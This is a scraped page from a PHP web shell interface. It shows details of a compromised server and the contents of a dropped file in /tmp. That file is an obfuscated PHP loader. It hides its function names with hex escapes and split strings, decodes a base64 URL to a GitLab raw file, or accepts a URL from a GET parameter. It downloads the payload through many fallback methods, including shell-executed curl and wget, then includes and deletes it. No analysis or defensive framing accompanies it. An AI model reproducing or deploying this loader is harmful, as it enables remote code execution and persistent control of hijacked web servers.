403Webshell
Server IP : 172.104.253.219  /  Your IP : 216.73.216.244
Web Server : Apache/2.4.68 (Debian)
System : Linux f9626dc847bb 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : //tmp/tmp_LDOQCh
<?php
/* Loader */

session_start();$u=$_SESSION['fxah']??$_GET['b']??base64_decode('aHR0cHM6Ly9naXRsYWIuY29tL2FyZGVhaW5kYWgtZ3JvdXAvYXJkZWFyZXAvLS9yYXcvbWFpbi9tYXNzeG4udHh0');if(!$u)exit;

 $f=[
'ni'=>'file'.'_ge'.'t_'.'con'.'ten'.'ts',
'rv'=>"\x66\x6f\x70\x65\x6e",
'ny'=>"\x73\x74\x72\x65\x61\x6d\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73",
'ysd'=>"\x66\x63\x6c\x6f\x73\x65",
'ba'=>"\x63\x75\x72\x6c\x5f\x69\x6e\x69\x74",
'zl'=>"\x63\x75\x72\x6c\x5f\x73\x65\x74\x6f\x70\x74\x5f\x61\x72\x72\x61\x79",
'cym'=>'curl'.'_exe'.'c',
'fgm'=>"\x63\x75\x72\x6c\x5f\x63\x6c\x6f\x73\x65",
'cpn'=>"\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e",
'bpx'=>'stre'.'am_s'.'ocke'.'t_c'.'lie'.'nt',
'axl'=>'so'.'ck'.'et_'.'crea'.'te',
'oec'=>"\x73\x6f\x63\x6b\x65\x74\x5f\x63\x6f\x6e\x6e\x65\x63\x74",
'ct'=>'soc'.'ket'.'_wri'.'te',
'ud'=>"\x73\x6f\x63\x6b\x65\x74\x5f\x72\x65\x61\x64",
'ice'=>'sock'.'et_'.'clo'.'se',
'slp'=>'str'.'eam_'.'sock'.'et_s'.'hu'.'tdow'.'n',
'np'=>"\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e",
'pdc'=>'pr'.'oc_c'.'lose',
'bp'=>"\x65\x78\x65\x63",
'zp'=>"\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63",
'zvx'=>'pas'.'st'.'hr'.'u',
'vmd'=>"\x74\x65\x6d\x70\x6e\x61\x6d",
'jr'=>'fil'.'e_'.'put_'.'con'.'ten'.'ts',
'qyi'=>"\x75\x6e\x6c\x69\x6e\x6b",
'nj'=>'sys'.'_get'.'_te'.'mp'.'_d'.'ir',
'gep'=>"\x70\x61\x72\x73\x65\x5f\x75\x72\x6c",
'cz'=>'get'.'host'.'byn'.'am'.'e',
'lbg'=>'st'.'re'.'am_c'.'on'.'tex'.'t_c'.'re'.'ate',
'nov'=>"\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73",
'ou'=>'Sp'.'lF'.'ileO'.'bj'.'ect',
'if'=>'ob'.'_s'.'tart',
'uqi'=>'ob'.'_get'.'_c'.'lea'.'n'
];
// Simpan ke globals agar bisa diakses dari dalam fungsi
 $GLOBALS['_naulep'] = $f;

function go($z){
    $f = $GLOBALS['_naulep'];   // ambil registry dari globals
    $cx=$f['lbg'](['http'=>['timeout'=>25],'ssl'=>['verify_peer'=>false]]);
    $d=@$f['ni']($z,false,$cx);if(trim($d))return$d;
    if($f['nov']($f['ba'])){$h=$f['ba']();$f['zl']($h,[CURLOPT_URL=>$z,CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>25,CURLOPT_SSL_VERIFYPEER=>0]);$r=$f['cym']($h);$f['fgm']($h);if(trim($r))return$r;}
    try{$r=new $f['ou']($z);$b='';while(!$r->eof())$b.=$r->fgets();if(trim($b))return$b;}catch(Exception$x){}
    $fp=@$f['rv']($z,'r',false,$f['lbg'](['http'=>['timeout'=>25]]));if($fp){$d=$f['ny']($fp);$f['ysd']($fp);if(trim($d))return$d;}
    $p=$f['gep']($z);$hn=$p['host'];$pt=$p['path'];$po=($p['scheme']=='https')?443:80;
    if($hn){
        $s=@$f['cpn']($hn,$po,$x,$y,25);if($s){fwrite($s,"GET $pt HTTP/1.1\r\nHost:$hn\r\nC:close\r\n\r\n");$r='';while(!feof($s))$r.=fgets($s);fclose($s);$i=strpos($r,"\r\n\r\n");if($i!==false)return substr($r,$i+4);}
        $ad=(($p['scheme']=='https')?'ssl://':'tcp://')."$hn:$po";$sk=@$f['bpx']($ad,$en,$es,25);if($sk){fwrite($sk,"GET $pt HTTP/1.1\r\nHost:$hn\r\nC:close\r\n\r\n");$d=$f['ny']($sk);$f['slp']($sk,STREAM_SHUT_RDWR);$i=strpos($d,"\r\n\r\n");if($i!==false)return substr($d,$i+4);}
        if($f['nov']($f['axl'])){$ip=$f['cz']($hn);if($ip!=$hn){$s=@$f['axl'](AF_INET,SOCK_STREAM,SOL_TCP);if($s&&@$f['oec']($s,$ip,$po)){$f['ct']($s,"GET $pt HTTP/1.1\r\nHost:$hn\r\nC:close\r\n\r\n");$bf='';while($c=@$f['ud']($s,1024))$bf.=$c;$f['ice']($s);$i=strpos($bf,"\r\n\r\n");if($i!==false)return substr($bf,$i+4);}}}
    }
    $safe=escapeshellarg($z);
    foreach(["curl -sL --max-time 25 $safe","wget -qO- --timeout=25 $safe"] as$cmd){
        if($f['nov']($f['np'])){$pr=@$f['np']($cmd,[[0=>['pipe','r'],1=>['pipe','w'],2=>['pipe','w']]],$pi);if(is_resource($pr)){fclose($pi[0]);$o=$f['ny']($pi[1]);fclose($pi[1]);fclose($pi[2]);$f['pdc']($pr);if(trim($o))return$o;}}
        if($f['nov']($f['bp'])){@$f['bp']($cmd.'2>&1',$o,$rv);if(!$rv&&$o)return join("\n",$o);}
        if($f['nov']($f['zp'])){$o=@$f['zp']($cmd.'2>&1');if(trim($o))return$o;}
        if($f['nov']($f['zvx'])){$f['if']();@$f['zvx']($cmd.'2>&1',$rv);$o=$f['uqi']();if(!$rv&&trim($o))return$o;}
    }return null;
}

function doIt($c){
    $f = $GLOBALS['_naulep'];   // ambil registry dari globals
    if(!trim($c))return;
    $t=$f['nj']();$tmp=$f['vmd']($t,'_');@$f['jr']($tmp,$c);include$tmp;@$f['qyi']($tmp);
}

 $d=go($u);if($d)doIt($d);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit